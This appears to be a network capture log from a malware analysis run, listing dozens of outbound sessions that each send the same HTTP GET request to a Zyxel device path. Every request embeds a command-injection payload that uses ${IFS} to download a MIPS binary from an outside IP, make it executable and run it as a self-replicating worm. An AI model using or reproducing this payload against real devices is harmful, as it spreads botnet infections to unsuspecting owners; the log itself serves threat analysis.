                                            Feb 2, 2024 06:21:05.496999025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2549192.168.2.155800218.173.196.253443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.497028112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2550192.168.2.1556838102.136.95.131443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.497061014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2551192.168.2.1551708218.137.82.224443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.497097969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2552192.168.2.154115017.169.145.171443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.497139931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2553192.168.2.1536632173.189.200.156443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.497188091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2554192.168.2.155068480.10.194.157443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.497245073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2555192.168.2.1549050219.205.37.61443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.497267008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2556192.168.2.1539464109.172.124.126443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.497288942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2557192.168.2.1541852103.209.162.222443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.497311115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2558192.168.2.1535274203.91.88.171443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.497354031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2559192.168.2.1550984132.169.152.79443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.497395039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2560192.168.2.15565629.189.101.23443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.497428894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2561192.168.2.154309054.47.245.197443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.497490883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2562192.168.2.1534456189.99.200.162443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.497529984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2563192.168.2.1542112118.56.150.76443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.497555017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2564192.168.2.1538760119.170.236.75443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.497601032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2565192.168.2.1539532198.209.5.107443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.497637033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2566192.168.2.1548416181.64.154.10443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.497688055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2567192.168.2.1543386179.154.224.62443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.497730017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2568192.168.2.155429268.65.235.189443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.497757912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2569192.168.2.1535366178.86.166.247443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.497793913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2570192.168.2.1534274176.222.71.220443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.497838020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2571192.168.2.1549850140.117.6.42443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.497879028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2572192.168.2.155122835.29.48.117443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.497930050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2573192.168.2.1555404116.95.169.183443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.497976065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2574192.168.2.1551564220.219.164.168443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.498017073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2575192.168.2.1542198177.146.118.155443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.498050928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2576192.168.2.15335829.128.227.240443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.498076916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2577192.168.2.1554374187.3.198.77443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.498116016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2578192.168.2.1560400147.201.168.13443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.498132944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2579192.168.2.1557854166.9.193.51443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.498192072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2580192.168.2.1550890181.238.8.62443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.498248100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2581192.168.2.153463473.168.112.155443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.498279095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2582192.168.2.1555426176.181.50.157443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.498327971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2583192.168.2.1559866142.64.39.110443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.498366117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2584192.168.2.1551574138.6.42.29443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.498408079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2585192.168.2.15364265.168.215.22443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.498435974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2586192.168.2.1555872137.82.241.86443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.498483896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2587192.168.2.1539552131.219.39.60443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.498512983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2588192.168.2.1559302149.99.204.208443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.498532057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2589192.168.2.154524898.143.94.73443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.498598099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2590192.168.2.153722297.210.59.193443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.498639107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2591192.168.2.1546310151.158.255.107443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.498668909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2592192.168.2.1560154206.231.235.5443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.498707056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2593192.168.2.1542054163.206.13.20443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.498728037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2594192.168.2.15468764.34.83.120443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.498790026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2595192.168.2.153737877.110.189.116443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.498826027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2596192.168.2.1547560196.99.118.189443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.498891115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2597192.168.2.15434665.103.127.236443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.498935938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2598192.168.2.1557156109.120.197.217443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.498989105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2599192.168.2.1536904107.22.197.14443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.499034882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2600192.168.2.1541090212.20.142.187443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.499074936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2601192.168.2.1553218130.217.80.187443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.499108076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2602192.168.2.1542764111.105.46.233443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.499140024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2603192.168.2.155154094.255.2.123443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.499197006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2604192.168.2.1550052149.23.142.153443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.499239922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2605192.168.2.153556483.232.35.225443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.499290943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2606192.168.2.1548230148.137.146.216443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.499325991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2607192.168.2.1553410168.117.133.78443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.499357939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2608192.168.2.1532868201.80.129.189443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.499416113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2609192.168.2.1536128145.27.164.99443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.499420881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2610192.168.2.153637459.215.238.37443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.499455929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2611192.168.2.153565018.174.77.76443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.499514103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2612192.168.2.1534224164.203.166.102443
                                            TimestampBytes transferredDirectionData
